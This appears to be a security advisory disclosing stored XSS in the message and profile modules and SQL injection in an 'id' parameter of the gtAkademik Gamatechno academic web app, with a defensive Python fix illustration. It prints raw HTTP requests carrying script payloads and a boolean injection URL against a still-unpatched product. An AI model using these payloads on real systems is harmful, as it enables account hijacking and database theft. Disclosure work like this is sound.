gtAkademik Gamatechno SQL Injection and Persistent XSS

The gtAkademik Gamatechno web application is susceptible to SQL Injection and Cross-site Scripting (XSS).

Stored/Persistent XSS

The web application allows an attacker to store an XSS payload in the database (stored XSS), because user input is not sanitized. Two modules are affected: the Message module and the Update Profile module.

Persistent XSS in Message Module

The Message module provides internal messaging inside gtAkademik. A message containing an XSS payload can be sent to other users, for example to the administrator account.

POST /index.php?pModule=zsinppiZmQ==&pSub=zsinppiZmQ==&pAct=0dWjlpylpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=zsinppiZmQ==&pSub=xNKho6almcWem9isk5uW&pAct=18yZqg==
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 169

data[MessageSender]=XXXXXXXXXX&data[MessageReceiver]=XXXXXXXXXX&data[MessageTitle]=<script>&data[MessageContent]=<script>alert("XSS");</script>act=doCompose&compBtn=Kirim

Persistent XSS in User Profile Module (save the user profile)

This module updates the user profile. An XSS payload injected into a profile field is saved to the database, so every user who views that profile is exposed to the script.

POST /index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw== HTTP/1.1
Host: 1.1.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:8.0.1) Gecko/20100101 Firefox/8.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://1.1.1.1/index.php?pModule=1taZpQ==&pSub=0dWjmaCemQ==&pAct=xsedpw==&sia=ydeoo3FhY5dibpNyaWJilWdqY2RhqsrPmM6Xy5+hoKfOzGOjpqSox52V2J6kqprHnqxfnaCbxtpl1p3YqpuVnY/TnKM=
Cookie: PHPSESSID=XXXXXXXXXXXXXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded
Content-Length: 213

tanggal=02/08/1988&alamat_asal=XXXXXXXXXX&alamat=<script>alert("XSS");</script>&no_hp_mhs=XXXXXXXXXX&nama_ayah=&nama_ibu=&alamat_ortu=&no_telp_ortu=&simpan=Simpan

SQL Injection

The web application is also susceptible to SQL injection, because input is not sanitized. This allows an attacker to extract the contents of the database, including sensitive data such as the credentials stored in it.

The parameter ‘id’ is vulnerable to SQL Injection.

http://1.1.1.1/mod=transaksi_registrasi_pmb&sub=transaksi_detail&do=daftar&id=129000204' AND '1'='1
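As an added illustration that is not part of the original advisory, the following Python snippet reproduces both root causes against an in-memory SQLite table: the 'id' value from the URL above pasted into the SQL text versus bound as a parameter, and the stored payload from the message and profile requests above passed through HTML output encoding before display. The table and column names are constructed assumptions, not taken from gtAkademik.

```python
import html
import sqlite3

# Constructed sample rows standing in for the application's registration data;
# the table and column names are assumptions, not taken from gtAkademik.
ROWS = [
    ("129000204", "Budi", "Jl. Mawar 1"),
    ("129000205", "Sari", '<script>alert("XSS");</script>'),  # stored payload from the advisory
]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pendaftar (id TEXT, nama TEXT, alamat TEXT)")
    conn.executemany("INSERT INTO pendaftar VALUES (?, ?, ?)", ROWS)
    return conn

def lookup_vulnerable(conn, id_param):
    # Mirrors the flaw: the request parameter becomes part of the SQL text,
    # so a quote inside the value changes the structure of the query.
    sql = f"SELECT id, nama, alamat FROM pendaftar WHERE id = '{id_param}'"
    return conn.execute(sql).fetchall()

def lookup_fixed(conn, id_param):
    # Parameter binding: the value is data only and can never alter the grammar.
    sql = "SELECT id, nama, alamat FROM pendaftar WHERE id = ?"
    return conn.execute(sql, (id_param,)).fetchall()

def render_alamat(alamat):
    # Encode for an HTML context before echoing stored data; this is the
    # missing step behind the stored XSS in both modules.
    return html.escape(alamat, quote=True)

def demo():
    conn = make_db()
    payload = "129000204' AND '1'='1"  # the id value from the advisory URL
    return {
        # Vulnerable: the query becomes id = '129000204' AND '1'='1', and the
        # injected condition decides that the row for 129000204 is returned.
        "vulnerable": lookup_vulnerable(conn, payload),
        # Fixed: no id literally equals the whole string, so nothing matches.
        "fixed": lookup_fixed(conn, payload),
        # The stored script is rendered as inert text.
        "escaped": render_alamat(ROWS[1][2]),
    }

if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```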

Impact

Malicious authenticated users can exploit the XSS vulnerabilities to execute arbitrary script in the context of a logged-in user's session. In addition, malicious authenticated users may use the SQL injection vulnerability to execute arbitrary SQL queries, potentially viewing or modifying data in the backend database.

Solution

We are currently not aware of any update or patch available from the vendor.

About Thomas Gregory

Jai Guru Deva. What the eyes see and the ears hear, the mind believes. Gamer. Free thinker. Pwning @Spentera !